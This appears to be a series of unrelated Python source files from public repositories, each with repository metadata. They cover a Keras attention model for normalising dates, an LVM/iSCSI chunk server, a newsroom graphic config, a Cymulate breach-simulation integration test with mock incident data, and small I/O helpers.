Concatenate(name='concatenate_c') self.concatenate_context = Concatenate() self.post_activation_LSTM_cell = LSTM(self.n_h, return_state=True, name='decoder_lstm') self.output_layer = Dense(len(self.vocab_target), activation='softmax', name='decoder_output') self.lambda_argmax = Lambda(K.argmax, arguments={'axis': -1}, name='argmax_tensor') self.lambda_one_hot = Lambda(TensorUtils.one_hot_tensor, arguments={'num_classes': len(self.vocab_target)}, name='one_hot_tensor') # self.reshape = Reshape(target_shape=(1, len(self.vocab_target))) self.lambda_expand_dims = Lambda(K.expand_dims, arguments={'axis': 1}, name='expand_dims') self.lambda_whole_top_k = Lambda(TensorUtils.whole_top_k_tensor, arguments={'k': self.k}, name='whole_top_k_tensor') def __one_step_attention_model(self, Tx, n_a, n_h): """ attention 模块的实现 把 几个网络层(keras layer) 包装为 model ,并通过重新定义 model 的输入的方式 来共享 layer 的权重 :param Tx: 输入序列的长度 :param n_a: encoder-lstm 中隐藏状态的维度 :param n_h: decoder-lstm 中隐藏状态的维度 :return: keras model model inputs: [a0, s_prev0] model outputs : context 向量, 作为 decoder-lstm 的输入 shape: (N, 1, 2*n_a) """ repeator = RepeatVector(Tx) concatenator = Concatenate(axis=2) densor = Dense(1, activation="relu") activator = Softmax(axis=1) dotor = Dot(axes=1) a0 = Input(shape=(Tx, 2 * n_a), name='a') # shape: (N, Tx, 2 * n_a) s_prev0 = Input(shape=(n_h,), name='s_prev') # shape: (N, Tx, n_h) a = a0 # 否则报错 : ValueError: Graph disconnected: cannot obtain value for tensor Tensor .... # The following previous layers were accessed without issue: [] s_prev = s_prev0 s_prev = repeator(s_prev) # shape: (N, Tx, n_h) concat = concatenator([a, s_prev]) # shape: (N, Tx, 2*n_a+n_h) e = densor(concat) # shape: (N, Tx, 1) alphas = activator(e) # shape: (N, Tx, 1) context = dotor([alphas, a]) # shape: (N, 1, 2*n_a) model = Model(inputs=[a0, s_prev0], outputs=context) # Model 也可以作为一个网络层 return model def train_model(self,): """ 将各个 网络层(layer) 拼接为训练计算图, 包括 encoder 和 decoder 1. 解码时加入上一个时刻的输出单词, 考虑场景: 若前一个时刻的词是 '-', 则当前词必须为数字 在 decoder中, 经过 softmax 输出后 取最大的 那一个字符的 one-hot 向量 与 context 拼接后输入 decoder-lstm 2. 修改 decoder-LSTM 的初始 隐藏状态的输入 ,由原来的 0 向量,改为 encoder-LSTM 最后一个时间步的隐状态(注意进行拼接) 3. 把所有的 keras layer object 声明为类变量,以便 后面重构 decoder 可以使用训练好的网络结构 :return: Keras model instance """ X = Input(shape=(self.Tx, self.vocab_source_size)) # shape: (N,Tx,vocab_source_size) pred0 = Input(shape=(1, self.vocab_target_size), name='pred0') # shape: (m ,1, 11) pred = pred0 # print('pred: after Input', pred) outputs = [] # lstm-encoder a, forward_h, forward_c, backward_h, backward_c = self.pre_activation_LSTM_cell( inputs=X) # shape of a : (N,Tx, 2*n_a) # 最后一个时间步的 隐藏状态向量 h = self.concatenate_h(inputs=[forward_h, backward_h]) # shape (N, 2*n_a=128) # 最后一个时间步的 细胞状态向量 c = self.concatenate_c(inputs=[forward_c, backward_c]) # shape (N, 2*n_a=128) # lstm-decoder for t in range(self.Ty): # 遍历 Ty 个时间步 # TODO: 循环结构有可能导致 OON, 训练计算图应避免写此结构 context = self.model_one_step_attention(inputs=[a, h]) # shape of context : (N, 1, 2*n_a=128) # print('context after one_step_attention: ', context) context = self.concatenate_context(inputs=[context, pred]) # shape of context: (N,1,128+11=139) # print('context after Concatenate: ', context) h, _, c = self.post_activation_LSTM_cell(inputs=context, initial_state=[h, c]) # 输入 context 只有1个时间步 out = self.output_layer(inputs=h) # shape (N, vocab_target) pred = self.lambda_argmax(inputs=out) # shape (N, ) pred = self.lambda_one_hot(inputs=pred) # shape (N, vocab_target_size) # print(pred) pred = self.lambda_expand_dims(inputs=pred) # shape: (N ,1, vocab_target_size) # print(pred) outputs.append(out) # shape : (Ty, N, vocab_target_size) model = Model(inputs=[X, pred0], outputs=outputs) # shape of outputs : ( Ty ,m ,vocab_target) return model def fit(self, Xoh, Yoh, epoch_num=120, batch_size=2048): """ 训练模型 :param Xoh: 输入序列 (one-hot化) :param Yoh: 输出序列 (one-hot化) :param epoch_num: 模型训练的 epoch 个数, 一般训练集所有的样本模型都见过一遍才算一个 epoch :param batch_size: 选择 min-Batch梯度下降时, 每一次输入模型的样本个数 (默认 = 2048) :return: """ N = np.shape(Xoh)[0] # 训练样本总数 # 打印 模型(计算图) 的所有网络层 # print(self.model_train.summary()) # 画出计算图 # plot_model(self.model_train, to_file='docs/images/model_train_attention.png', show_layer_names=True, show_shapes=True) opt = Adam(lr=0.005, beta_1=0.9, beta_2=0.999, decay=0.01/epoch_num) self.model_train.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy']) outputs = list(Yoh.swapaxes(0, 1)) # Yoh.swapaxes(0,1) 第0维度 和 第1 维度交换,原来为(N,T_y,11) 变换后 为:(T_y,N,11) pred0 = np.zeros((N, 1, self.vocab_target_size)) history = self.model_train.fit([Xoh, pred0], outputs, epochs=epoch_num, batch_size=batch_size, validation_split=0.1) # 将训练好的模型保存到文件 self.model_train.save(self.model_path) print('save model sucess ') def inference_model(self): """ 将各个 网络层(layer) 拼接为推理计算图 并实现 beamsearch (带窗口的贪心搜索) :return: """ X = Input(shape=(self.Tx, self.vocab_source_size)) # shape: (k, Tx, vocab_source_size) pred0 = Input(shape=(1, self.vocab_target_size), name='pred0') # shape: (k ,1, vocab_target_size) pred = pred0 # lstm-encoder a, forward_h, forward_c, backward_h, backward_c = self.pre_activation_LSTM_cell( inputs=X) # shape of a : (k, Tx, 2*n_a) # encoder 最后一个时间步的 隐藏状态向量 h = self.concatenate_h(inputs=[forward_h, backward_h]) # shape (k, 2*n_a=128) # encoder 最后一个时间步的 细胞状态向量 c = self.concatenate_c(inputs=[forward_c, backward_c]) # shape (k, 2*n_a=128) outputs = [] # 记录每一个时间步解码器输出的窗口 # lstm-decoder for t in range(self.Ty): # 遍历 Ty 个时间步 context = self.model_one_step_attention(inputs=[a, h]) # shape of context : (k, 1, 2*n_a=128) # print('context after one_step_attention: ', context) context = self.concatenate_context(inputs=[context, pred]) # shape of context: (k, 1, 128+11=139) # print('context after Concatenate: ', context) h, _, c = self.post_activation_LSTM_cell(inputs=context, initial_state=[h, c]) # 输入 context 只有1个时间步 out = self.output_layer(inputs=h) # shape (k, vocab_target) # for beamsearch top_k_index = self.lambda_whole_top_k(inputs=out) # topk个元素 在矩阵中的标号, shape (k, 2) # TODO: 喂入数据后报错, 怀疑原因: 该层的输入为 shape (None, ...), 而输出为 shape (k, ...) # topk 的样本标号 shape (k, ) # sample_id = tf.gather(top_k_index, indices=[0], axis=1) # 通过索引取数组, 效果相当于 top_k_index[:, 0] # topk 的单词标号 shape (k, ) # word_id = tf.gather(top_k_index, indices=[1], axis=1) # 效果相当于 top_k_index[:, 1] sample_id = Lambda(tf.gather, arguments={'indices': [0], 'axis': 1})(top_k_index) word_id = Lambda(tf.gather, arguments={'indices': [1], 'axis': 1})(top_k_index) sample_id = Lambda(tf.squeeze)(sample_id) word_id = Lambda(tf.squeeze)(word_id) # h = K.gather(h, sample_id) # 通过索引取数组, 效果相当于 h = h[sample_id, :] # c = K.gather(c, sample_id) h = Lambda(K.gather, arguments={'indices': sample_id})(h) c = Lambda(K.gather, arguments={'indices': sample_id})(c) word_id_one_hot = self.lambda_one_hot(inputs=word_id) # shape (k, vocab_target_size) pred = self.lambda_expand_dims(inputs=word_id_one_hot) # shape: (k ,1, vocab_target_size) outputs.append(top_k_index) # shape : (Ty, k, 2) model = Model(inputs=[X, pred0], outputs=outputs) # shape of outputs : ( Ty ,m ,vocab_target) return model def beam_search_seq_gen(self, top_k_index_list): """ 根据每一个时间步的 beamsearch 的预测结果, 生成解码序列 :param top_k_index_list: topk 个元素在矩阵中的标号, shape (Ty, k, 2) :return: """ # decoder_seq shape (k, Ty) decoder_seq = [] # 解码序列 for t in range(self.Ty): # 遍历所有的时间步 top_k_index = top_k_index_list[t] # shape (k, 2) sample_id = top_k_index[:, 0] # topk 的样本标号 shape (k, ) word_id = top_k_index[:, 1] # topk 的单词标号 shape (k, ) if t == 0: decoder_seq = np.expand_dims(word_id, axis=1) # shape (k, 1) # [[20] # [11] # [32]] else: pre_decoder_seq = decoder_seq # shape:(k, t) 上一步的解码序列 # [[20] # [11] # [32]] decoder_seq = np.zeros((self.k, t + 1), dtype=np.int32) # 这一步 会在上一步 已有的解码序列的基础上 增加1个 解码位 # top_k_index: # [[1 10] # [0 12] # [0 21]] # sample_id: [1, 0, 0] # word_id: [10, 12, 21] for i in range(self.k): # 遍历所有的样本 # 前一步的解码情况作为前缀 prefix = pre_decoder_seq[sample_id[i]] # sample_id[0]: 1 , prefix: [11] # 这一步的解码位 c = word_id[i] # c: 10 # 前缀 decoder_seq[i, :] = np.concatenate((prefix, [c]), axis=0) # [11, 10] return decoder_seq def inference(self, Xoh): """ 使用训练好的模型进行推理 :param Xoh: 输入序列 (one-hot化) shape: (N, Tx, vocab_source_size) :return: candidate_group_list """ # 打印 模型(计算图) 的所有网络层 print(self.infer_model.summary()) # 画出计算图 plot_model(self.infer_model, to_file='images/infer_model_attention.png', show_layer_names=True, show_shapes=True) candidate_group_list = [] # beamsearch 的窗口大小 k = 3 pred0 = np.zeros((self.k, 1, self.vocab_target_size)) for source_oh in Xoh: # 遍历所有输入序列 # source_oh shape (Tx, vocab_source_size) source_oh = np.expand_dims(source_oh, axis=0) # shape (1, Tx, vocab_source_size) source_oh_batch = np.repeat(source_oh, self.k, axis=0) # print(source_oh.shape) #(3, 30, 37) k=3 将一个样本复制为3个, 输入模型进行推理 top_k_index = self.infer_model.predict([source_oh_batch, pred0]) decoder_result = self.beam_search_seq_gen(top_k_index) candidate_group = [] for prediction in decoder_result: candidate = ''.join(int_to_string(prediction, self.inv_vocab_target)) # print("output:", output) candidate_group.append(candidate) candidate_group_list.append(candidate_group) return candidate_group_list def evaluate(self, source_list, reference_list): """ 使用 bleu 对翻译结果进行评价 1.推理时采用 beamsearch (窗口大小 k = 3), 我们取 bleu 得分最高的作为此样本的预测序列 2.词元(term)的粒度 (1) '1990-09-23' 使用分隔符 '-' 切分为 3个 term ['1990','09','23'], 计算 bleu 时设置 N_gram 的长度上限为 2(仅仅考虑 1-graN, 2-gram) (2) '1978-12-21' 切分为 10个 term ['1', '9', '7', '8', '-', '1', '2', '-', '2', '1'] :param source_list: 待翻译的句子的列表 :param reference_list: 对照语料, 人工翻译的句子列表 :return: average_bleu_score : 所有 source 的最佳翻译结果的平均分数 ; best_result_list : 所有 source 的最佳翻译结果 best_result = (max_bleu_score, source, reference, best_candidate) """ bleu_score_list = np.zeros(len(source_list)) best_result_list = [] for i in range(len(source_list)): source = source_list[i] # "3rd of March 2002" reference = reference_list[i] # "2002-03-03" candidates = self.inference(source) # ['2002-03-03', '0002-03-03', '1002-03-03'] # reference_arr = reference.split('-') # 使用分隔符为 '-', 对 reference 切分为 ['2002','03','03'] # candidate_arr_list = [candidate.split('-')for candidate in candidates] reference_arr = list(reference) candidate_arr_list = [list(candidate) for candidate in candidates] candidates_bleu_score = BleuScore.compute_bleu_corpus( [[reference_arr]]*len(candidates), candidate_arr_list, N=4) max_bleu_score = np.max(candidates_bleu_score) best_idx = np.argmax(candidates_bleu_score) bleu_score_list[i] = max_bleu_score best_candidate = candidates[best_idx] best_result = (max_bleu_score, source, reference, best_candidate) print('i:{}, best_result:{}'.format(i,best_result)) best_result_list.append(best_result) average_bleu_score = np.average(bleu_score_list) return average_bleu_score, best_result_list class Test: def test_BasicMachineTranslation(self): # 配置 TensorFlow 在跑程序的时候不让程序占满 GPU 内存 # physical_devices = tf.config.list_physical_devices('GPU') # tf.config.experimental.set_memory_growth(physical_devices[0], enable=True) m = 10000 # 数据集中的样本总数 dataset, human_vocab, machine_vocab, inv_machine_vocab = load_dataset(m) # 0.了解数据集 print(dataset[:5]) # human date machine date # 待翻译的日期 翻译后的日期 # ('9 may 1998', '1998-05-09'), # ('10.11.19', '2019-11-10'), # ('9/10/70', '1970-09-10'), # ('saturday april 28 1990', '1990-04-28'), # ('thursday january 26 1995', '1995-01-26'), print(human_vocab) print(machine_vocab) Tx = 30 Ty = 10 X, Y, Xoh, Yoh = preprocess_data(dataset, human_vocab, machine_vocab, Tx, Ty) # X 为待翻译的日期, Y 为翻译后的标准化的日期 # Xoh 为 X 的 one-hot 化表示 , Yoh 为 Y 的 one-hot 化表示 print("X.shape:", X.shape) print("Y.shape:", Y.shape) print("Xoh.shape:", Xoh.shape) print("Yoh.shape:", Yoh.shape) sol = BasicMachineTranslation() sol.model_implementation_naive(Tx=Tx, Ty=Ty, machine_vocab=machine_vocab, human_vocab=human_vocab, Xoh=Xoh, Yoh=Yoh, m=m) # sol.model_implementation_v2(Tx=Tx, Ty=Ty, machine_vocab=machine_vocab, inv_machine_vocab=inv_machine_vocab, # human_vocab=human_vocab, Xoh=Xoh, Yoh=Yoh, m=m) def test_MachineTranslationV1(self): m = 10000 # 数据集中的样本总数 dataset, human_vocab, machine_vocab, inv_machine_vocab = load_dataset(m) # 0.了解数据集 print(dataset[:5]) # human date machine date # 待翻译的日期 翻译后的日期 # ('9 may 1998', '1998-05-09'), # ('10.11.19', '2019-11-10'), # ('9/10/70', '1970-09-10'), # ('saturday april 28 1990', '1990-04-28'), # ('thursday january 26 1995', '1995-01-26'), print(human_vocab) print(machine_vocab) # 划分训练集和测试集 train_dataset, test_dataset = train_test_split(dataset, test_size=0.2, random_state=1024) Tx = 30 Ty = 10 X, Y, Xoh, Yoh = preprocess_data(train_dataset, human_vocab, machine_vocab, Tx, Ty) # X 为待翻译的日期(字符以标号表示), Y 为翻译后的标准化的日期(字符以标号表示) # Xoh 为 X 的 one-hot 化表示 , Yoh 为 Y 的 one-hot 化表示 print("X.shape:", X.shape) print("Y.shape:", Y.shape) print("Xoh.shape:", Xoh.shape) print("Yoh.shape:", Yoh.shape) # trainer = MachineTranslationV1(Tx=Tx, Ty=Ty, n_a=64, n_s=128, machine_vocab=machine_vocab, # inv_machine_vocab=inv_machine_vocab, human_vocab=human_vocab) # trainer.fit(Xoh=Xoh, Yoh=Yoh, epoch_num=200, batch_size=2048) infer = MachineTranslationV1(Tx=Tx, Ty=Ty, n_a=64, n_s=128, machine_vocab=machine_vocab, inv_machine_vocab=inv_machine_vocab, human_vocab=human_vocab, use_pretrain=True) example = "december 21 1978" candidates = infer.inference(example) print("source:", example) # 待翻译的句子 print("beam search candidates: \n", candidates) # 模型翻译的句子列表 # ['9987-12-21', '1988-12-21', '2987-12-21'] test_dataset_arr = np.array(test_dataset[:200]) # 测试数据全部跑一遍太慢了 X_test = test_dataset_arr[:, 0] # 待翻译的日期(源序列) Y_test = test_dataset_arr[:, 1] # 翻译后的日期(目标序列) average_bleu_score, best_result_list = infer.evaluate(X_test,Y_test) print('average_bleu_score:', average_bleu_score) def test_MachineTranslationV2(self): m = 10000 # 数据集中的样本总数 dataset, vocab_source, vocab_target, inv_vocab_target = load_dataset(m) # 0.了解数据集 print(dataset[:5]) # human date machine date # 待翻译的日期 翻译后的日期 # ('9 may 1998', '1998-05-09'), # ('10.11.19', '2019-11-10'), # ('9/10/70', '1970-09-10'), # ('saturday april 28 1990', '1990-04-28'), # ('thursday january 26 1995', '1995-01-26'), print(vocab_source) print(vocab_target) # 划分训练集和测试集 train_dataset, test_dataset = train_test_split(dataset, test_size=0.2, random_state=1024) Tx = 30 Ty = 10 X, Y, Xoh, Yoh = preprocess_data(train_dataset, vocab_source, vocab_target, Tx, Ty) # X 为待翻译的日期(字符以标号表示), Y 为翻译后的标准化的日期(字符以标号表示) # Xoh 为 X 的 one-hot 化表示 , Yoh 为 Y 的 one-hot 化表示 print("X.shape:", X.shape) print("Y.shape:", Y.shape) print("Xoh.shape:", Xoh.shape) print("Yoh.shape:", Yoh.shape) # 1.模型训练 n_a = 64 n_h = 128 # trainer = MachineTranslation(Tx=Tx, Ty=Ty, n_a=n_a, n_h=n_h, vocab_target=vocab_target, # inv_vocab_target=inv_vocab_target, vocab_source=vocab_source, # use_pretrain=False) # trainer.fit(Xoh=Xoh, Yoh=Yoh, epoch_num=50, batch_size=512) # 2.模型推理 X_test, Y_test, Xoh_test, Yoh_test = preprocess_data(test_dataset, vocab_source, vocab_target, Tx, Ty) # tf.python.framework_ops.disable_eager_execution() infer = MachineTranslationV2(Tx=Tx, Ty=Ty, n_a=n_a, n_h=n_h, vocab_target=vocab_target, inv_vocab_target=inv_vocab_target, vocab_source=vocab_source, use_pretrain=True) candidate_group_list = infer.inference(Xoh_test[:10]) print(candidate_group_list) # average_bleu_score, best_result_list = infer.evaluate(X_test,Y_test) # # print('average_bleu_score:', average_bleu_score) if __name__ == '__main__': test = Test() # test.test_BasicMachineTranslation() test.test_MachineTranslationV1() # test.test_MachineTranslationV2()
34.600894
128
0.586628
8bd06748bac62ea851dbcc3b99fe1b5f1ca60408
4,998
py
Python
ChunkServer.py
lihuiba/SoftSAN
1b8ab2cae92b7aac34211909b27d4ebe595275d7
[ "Apache-2.0" ]
1
2015-08-02T09:53:18.000Z
2015-08-02T09:53:18.000Z
ChunkServer.py
lihuiba/SoftSAN
1b8ab2cae92b7aac34211909b27d4ebe595275d7
[ "Apache-2.0" ]
null
null
null
ChunkServer.py
lihuiba/SoftSAN
1b8ab2cae92b7aac34211909b27d4ebe595275d7
[ "Apache-2.0" ]
2
2018-03-21T04:59:50.000Z
2019-12-03T15:54:17.000Z
import rpc, logging import messages_pb2 as msg import guid as Guid import mds, config, util import gevent.server import Backend from pytgt.tgt_ctrl import * import random class ChunkServer: def __init__(self, prefix_vol='lv_softsan_', vgname='VolGroup'): self.lvm = Backend.LVM_SOFTSAN() self.tgt = Tgt() self.prefix_vol = prefix_vol self.vgname = vgname # always use lun_index=1. def AssembleVolume(self, req): self.tgt.reload() ret = msg.AssembleVolume_Response() str_guid = Guid.toStr(req.volume.guid) lv_name = self.prefix_vol+str_guid if not self.lvm.haslv(lv_name): ret.error = "Chunk {0} does not exist!".format(str_guid) return ret target_name = "iqn:softsan_"+str_guid target_id = self.tgt.target_name2target_id(target_name) if target_id != None: ret.access_point = target_name return ret while True: target_id = str(random.randint(0,1024*1024)) if not self.tgt.is_in_targetlist(target_id): break lun_path = '/dev/'+self.vgname+'/'+lv_name if self.tgt.new_target_lun(target_id, target_name, lun_path, 'ALL')!=None: ret.error = "Failed to export chunk {0} with tgt".format(str_guid) return ret ret.access_point = target_name return ret def DisassembleVolume(self, req): self.tgt.reload() ret = msg.DisassembleVolume_Response() target_name = req.access_point target_id = self.tgt.target_name2target_id(target_name) if target_id==None: ret.error='No such access_point' return ret if self.tgt.delete_target(target_id)!=None: ret.error=('failed to Disassemble Volume'+target_name) return ret # try to create every requested chunk. however, if some chunk can not be created, fill the ret.error with the output of lvcreate def NewChunk(self, req): self.lvm.reload() ret = msg.NewChunk_Response() size = str(req.size)+'M' for i in range(req.count): a_guid = Guid.generate() lv_name = self.prefix_vol+Guid.toStr(a_guid) lv_size = size output = self.lvm.lv_create(self.vgname, lv_name, lv_size) if output!=None: ret.error = str(i) + ':' + output + ' ' break t=ret.guids.add() Guid.assign(t, a_guid) return ret # try to delete every requested chunk. if it can not delete, fill the ret.error with output of lvremove def DeleteChunk(self, req): self.lvm.reload() ret = msg.DeleteChunk_Response() print 'ChunkServer: DeleteChunk' for a_guid in req.guids: str_guid=Guid.toStr(a_guid) lv_name = self.prefix_vol+str_guid lv_path = '/dev/'+self.vgname+'/'+lv_name output = self.lvm.lv_remove(lv_path) if output!=None: ret.error = "Unable to delete chunk {0}:\n{1}".format(str_guid, output) break t=ret.guids.add() Guid.assign(t, a_guid) return ret def doHeartBeat(self, serviceport, stub): serviceip=stub.socket.getsockname()[0] while True: info=msg.ChunkServerInfo() info.ServiceAddress=serviceip info.ServicePort=serviceport self.lvm.reload_softsan_lvs() for lv in self.lvm.softsan_lvs: chk=info.chunks.add() name4guid = lv.name.split(self.prefix_vol)[1] Guid.assign(chk.guid, Guid.fromStr(name4guid)) chk.size = int(lv.get_sizes(lv.total_extents)[2]) stub.callMethod('ChunkServerInfo', info) print 'for test--------------------------------', random.randint(0,100) gevent.sleep(1) def heartBeat(self, confobj): guid=Guid.generate() stub=rpc.RpcStub(guid, None, mds.MDS) while True: try: socket=gevent.socket.socket() socket.connect((confobj.mdsaddress, int(confobj.mdsport))) mdsEndpoint=(confobj.mdsaddress, int(confobj.mdsport)) socket.connect(mdsEndpoint) stub.socket=socket self.doHeartBeat(int(confobj.port), stub) except KeyboardInterrupt: raise except: logging.debug('An error occured during heart beat, preparing to retry', exc_info=1) gevent.sleep(2) def test_ChunkServer(): print ' test begin '.center(100,'-') print server=ChunkServer() logging.basicConfig(level=logging.DEBUG) # mock the newchunk request from client req_newchunk=msg.NewChunk_Request() req_newchunk.size=32 req_newchunk.count=1 ret_newchunk = server.NewChunk(req_newchunk) # mock the assemblevolume request from client req_assemblevolume=msg.AssembleVolume_Request() Guid.assign(req_assemblevolume.volume.guid, ret_newchunk.guids[-1]) req_assemblevolume.volume.size=32 ret_assemblevolume = server.AssembleVolume(req_assemblevolume) # # mock req_disassemblevolume req_disassemblevolume = msg.DisassembleVolume_Request() req_disassemblevolume.access_point = ret_assemblevolume.access_point ret_disassemblevolume = server.DisassembleVolume(req_disassemblevolume) # mock the delchunk request from client req_delchunk = msg.DeleteChunk_Request() for a_guid in ret_newchunk.guids: t=req_delchunk.guids.add() Guid.assign(t, a_guid) ret_delchunk = server.DeleteChunk(req_delchunk) print print ' test end '.center(100,'-') if __name__=='__main__': pass # link_test() #test_ChunkServer()
31.2375
130
0.726491
7bfa1761e0f14130896d9a6799049a6aae704952
394
py
Python
2015/11/look-begin-rate-table/graphic_config.py
nprapps/graphics-archive
97b0ef326b46a959df930f5522d325e537f7a655
[ "FSFAP" ]
14
2015-05-08T13:41:51.000Z
2021-02-24T12:34:55.000Z
2015/11/look-begin-rate-table/graphic_config.py
nprapps/graphics-archive
97b0ef326b46a959df930f5522d325e537f7a655
[ "FSFAP" ]
null
null
null
2015/11/look-begin-rate-table/graphic_config.py
nprapps/graphics-archive
97b0ef326b46a959df930f5522d325e537f7a655
[ "FSFAP" ]
7
2015-04-04T04:45:54.000Z
2021-02-18T11:12:48.000Z
#!/usr/bin/env python import base_filters COPY_GOOGLE_DOC_KEY = '1qBD8PVaqBNYx3iyXuQmNJgGFtF7E8cysyGeiBlMMEEw' USE_ASSETS = False # Use these variables to override the default cache timeouts for this graphic # DEFAULT_MAX_AGE = 20 # ASSETS_MAX_AGE = 300 def percent(value): return unicode(round(float(value), 3) * 100) + '%' JINJA_FILTER_FUNCTIONS = base_filters.FILTERS + [percent]
21.888889
77
0.771574
efb9e57ba66eb8f54906265e8958d1d884c48c2e
7,084
py
Python
Packs/Cymulate/Integrations/Cymulate/Cymulate_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
799
2016-08-02T06:43:14.000Z
2022-03-31T11:10:11.000Z
Packs/Cymulate/Integrations/Cymulate/Cymulate_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
9,317
2016-08-07T19:00:51.000Z
2022-03-31T21:56:04.000Z
Packs/Cymulate/Integrations/Cymulate/Cymulate_test.py
diCagri/content
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
[ "MIT" ]
1,297
2016-08-04T13:59:00.000Z
2022-03-31T23:43:06.000Z
import demistomock as demisto from Cymulate import cymulate_test, fetch_incidents, cymulate_get_incident_info, Client, CymulateModuleTypeEnum BASE_URL = 'https://api.cymulate.com/v1/' MOKE_TEST = {"success": True, "data": ["Phishing Awareness", "Web Application Firewall", "Lateral Movement", "Data Exfiltration", "Immediate Threats Intelligence", "Email Gateway", "Endpoint Security", "Web Gateway", "Full Kill-Chain APT"]} FETCH_INCIDENTS_TEST = {"success": True, "data": [ { "Id": "5dbeaf53a910862fa859491e", "Name": " Ursnif infection with Dridex and Powershell Empire", "Timestamp": "03/11/2019 05:43:31", "InProgress": False }, { "Id": "5dbea88c357ca849ac41bb2e", "Name": "Pcap and malware for an ISC diary (Emotet + Trickbot)", "Timestamp": "03/11/2019 05:14:36", "InProgress": False }, { "Id": "5d528f78705e364e9055033c", "Name": "BlackSquid Drops XMRig Miner", "Timestamp": "13/08/2019 06:22:48", "InProgress": False }, { "Id": "5d25dc5d86d73c22203d919f", "Name": "dll2", "Timestamp": "10/07/2019 08:38:53", "InProgress": False }, { "Id": "5cc7109ca842693cc0f15588", "Name": "hot files test 8", "Timestamp": "29/04/2019 10:56:28", "InProgress": False }, { "Id": "5c8e6cbf3dd9fe08186d7b64", "Name": "Hancitor malspam infections from 2018-08-13 and 2018-08-14", "Timestamp": "17/03/2019 11:50:23", "InProgress": False } ] } CYMULATE_GET_INCIDENT_INFO_TEST = {"success": True, "data": [ { "Module": "Immediate Threats Intelligence", "Penetration_Vector": "-", "Attack_Payload": "2019-07-08-Ursnif-binary-retrieved-by-Word-macro_" "2b999360-a3f9-11e9-980e-633d1efd31f3.exe", "Name": " Ursnif infection with Dridex and Powershell Empire", "Timestamp": "03/11/2019 05:45:47", "Sha1": "ff57bfaed6db3379bbf69a19404a6e21668a7a52", "Sha256": "0894e82d9397d909099c98fe186354591ae86a73230700f462b72ae36c700ddf", "Md5": "ef99338df4078fab6e9a8cf6797a1d14", "Status": "Penetrated", "Attack_Vector": "Endpoint Security", "Attack_Type": "Antivirus", "Mitigation": "N/A", "Description": "N/A", "ID": "c1d33138a2101724889862152444ec7e", "Related_URLS": "N/A", "Related_Email_Addresses": "N/A" } ] } TECHNICAL_INCIDENTS_IDS = ['5dbeaf53a910862fa859491e', '5dbea88c357ca849ac41bb2e', '5d528f78705e364e9055033c', '5d25dc5d86d73c22203d919f', '5cc7109ca842693cc0f15588', '5c8e6cbf3dd9fe08186d7b64'] MOCK_TIMESTAMP = "2020-12-02T16%3A32%3A37" ATTACK_ID = "5dbeaf53a910862fa859491e" def local_get_last_run(): return {} def test_test_client(requests_mock): requests_mock.get(BASE_URL + 'user/modules', json=MOKE_TEST) client = Client( base_url=BASE_URL, headers={"x-token": 'RW#fdsfds34e343rdes'}, verify=False) cymulate_test(client=client, is_fetch=False) def test_fetch_incidents(mocker, requests_mock): requests_mock.get(BASE_URL + 'immediate-threats/ids?from={}'.format(MOCK_TIMESTAMP), json=FETCH_INCIDENTS_TEST) for incident_id in TECHNICAL_INCIDENTS_IDS: requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + incident_id, json=CYMULATE_GET_INCIDENT_INFO_TEST) mocker.patch.object(demisto, 'params', return_value={'fetch_time': MOCK_TIMESTAMP}) mocker.patch.object(demisto, 'getLastRun', side_effect=local_get_last_run) client = Client( base_url=BASE_URL, headers={"x-token": 'RW#fdsfds34e343rdes'}, verify=False) next_run, incidents, remain_incidents = fetch_incidents(client=client, module_type=CymulateModuleTypeEnum.IMMEDIATE_THREATS, last_run={'last_fetch': '2020-12-02T16:32:37'}, first_fetch_time={}, only_penatrated=False, limit=20, integration_context=None) assert len(incidents) == 6 def test_cymulate_get_incident_info(mocker, requests_mock): mocker.patch.object(demisto, 'args', return_value={"module_type": CymulateModuleTypeEnum.IMMEDIATE_THREATS.name, "attack_id": ATTACK_ID}) requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + ATTACK_ID, json=CYMULATE_GET_INCIDENT_INFO_TEST) client = Client( base_url=BASE_URL, headers={"x-token": 'RW#fdsfds34e343rdes'}, verify=False) # Get incident's parent id attack_id = demisto.args().get('attack_id') technical_info = cymulate_get_incident_info(client=client, attack_id=attack_id) assert(technical_info[0]['ID'] == CYMULATE_GET_INCIDENT_INFO_TEST['data'][0]['ID'])
48.190476
120
0.449605
ef58a8dd9159150f5c62dc1540bb5470aed1bc7c
1,370
py
Python
kts/core/backend/io.py
konodyuk/kts
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
[ "MIT" ]
18
2019-02-14T13:10:07.000Z
2021-11-26T07:10:13.000Z
kts/core/backend/io.py
konodyuk/kts
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
[ "MIT" ]
2
2019-02-17T14:06:42.000Z
2019-09-15T18:05:54.000Z
kts/core/backend/io.py
konodyuk/kts
3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7
[ "MIT" ]
2
2019-09-15T13:12:42.000Z
2020-04-15T14:05:54.000Z
import time import kts.core.backend.signal as rs class TextChunk(rs.Signal): def __init__(self, timestamp, text, run_id=None): self.timestamp = timestamp self.text = text self.run_id = run_id def get_contents(self): res = {'timestamp': self.timestamp, 'text': self.text} if self.run_id is not None: res['run_id'] = self.run_id return res class RemoteTextIO: def __init__(self, run_id=None): self.buf = "" self.run_id = run_id def write(self, b): self.buf += b if self.buf.find('\n') != -1: self.flush() def flush(self): if self.buf: for line in self.buf.split('\n'): if line: rs.send(TextChunk(time.time(), line + '\n', self.run_id)) self.buf = "" class LocalTextIO: def __init__(self, report, run_id): self.buf = "" self.report = report self.run_id = run_id def write(self, b): self.buf += b if b.find('\n') != -1: self.flush() def flush(self): if self.buf: self.report.update_text(self.run_id, timestamp=time.time(), text=self.buf) self.buf = "" class SuppressIO: def __init__(self): pass def write(self, b): pass def flush(self): pass
21.746032
86
0.535766
08e845d836398aafaf9d487f94d2d21eb1a18a13
802
py
Python
binary-tree-right-side-view/binary-tree-right-side-view.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
2
2021-12-05T14:29:06.000Z
2022-01-01T05:46:13.000Z
binary-tree-right-side-view/binary-tree-right-side-view.py
